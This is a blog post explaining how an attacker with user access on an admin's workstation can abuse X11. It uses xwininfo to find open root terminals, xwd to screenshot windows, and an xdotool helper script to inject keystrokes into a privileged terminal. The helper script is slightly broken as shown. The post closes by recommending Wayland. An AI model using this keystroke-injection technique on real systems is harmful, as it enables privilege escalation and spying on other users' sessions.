Friday, 20 April 2018

Privilege escalation and pivoting with the X Window System

What is X?

"X provides the basic framework for a GUI environment: drawing and moving windows on the display device and interacting with a mouse and keyboard. X does not mandate the user interface – this is handled by individual programs. As such, the visual styling of X-based environments varies greatly; different programs may present radically different interfaces."

X helps to give you a GUI and is very common. It is being phased out by Wayland; however, is still very popular.

How you can [ab]use X.

Suppose you have access to an Admin's workstation, and if they are anything like myself, they have a lot of windows open. When logged in as the user, you basically have control over their X session. This means that you can view what windows are open and even send keystrokes to them.

To view the windows and some rudimentary information about them, you can use:

$ xwininfo -tree -root -all

Looking through this, you can see easily see interesting windows. Searching for 'root@', for me, revealed that I had two root terminals open:

$ xwininfo  -root -tree | grep "root@"
        0x26008f2 "root@parrot:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64
0x2601f64 "root@llama:~": ("gnome-terminal-server" "Gnome-terminal")  960x1016+10+45  +960+64

Out of curiosity, we can even see what is on those windows by taking a dump of the window and viewing the dump in xwud or by converting it to a jpg:

$ xwd -id 0x2601f64 -out llama.xwd
$ convert llama.xwd llama.jpg


In order to take a screenshot, the window must be fully displayed or you are at risk of things being chopped off. Activating the window allows for a reliable screenshot, and you can even put the original window back when you are done:

$ PREV=`xdotool getactivewindow`; xdotool windowactivate  0x2601f64; xwd -id 0x2601f64 -out llama.xwd; xdotool windowactivate $PREV

Now for the fun part; let's send keyboard events to the window. To control the mouse and keyboard we can use a tool called 'xdotool'. I have found best results when sending single keystrokes along with a short delay. In addition, some characters have to be mapped to phrase. I made a small helper, xdotoolhelper, to handle this:



xdotool  windowactivate $WINDOW;
while read -n1 i; do
    case $i in
        "")    i="space"     ;;
        "\"")  i="quotedbl"  ;;
        "@")   i="at"        ;;
        "-")   i="minus"     ;;
        ";")   i="semicolon" ;;
    xdotool key $i
    sleep 0.01
done <<<"$MSG"
xdotool key Return

Now, we can simply send keyboard input to other windows:

$ ./ 0x2601f64 "yum -y install sl; sl"

Tadaa. Now we can control applications even if they originally required a 100 character passphrase, fingerprint recognition and a stool sample in order to authenticate.

Am I using X?

To determine if the user is using X, you can run the following:

$ loginctl
   SESSION    UID   USER   SEAT    TTY            
        c1    42    gdm    seat0   /dev/tty1      
        44    1000  adam   seat0   /dev/tty2      

2 sessions listed.

$ loginctl show-session 44 -p Type
<-- That is X

It's a feature, not a bug.

Windowing systems have a bit of a bad history off bridging supposedly sandboxed things, not due to bugs but its inherent design. Wayland is replacing X and has a much stronger security focus. Move to Wayland!

No comments:

Post a Comment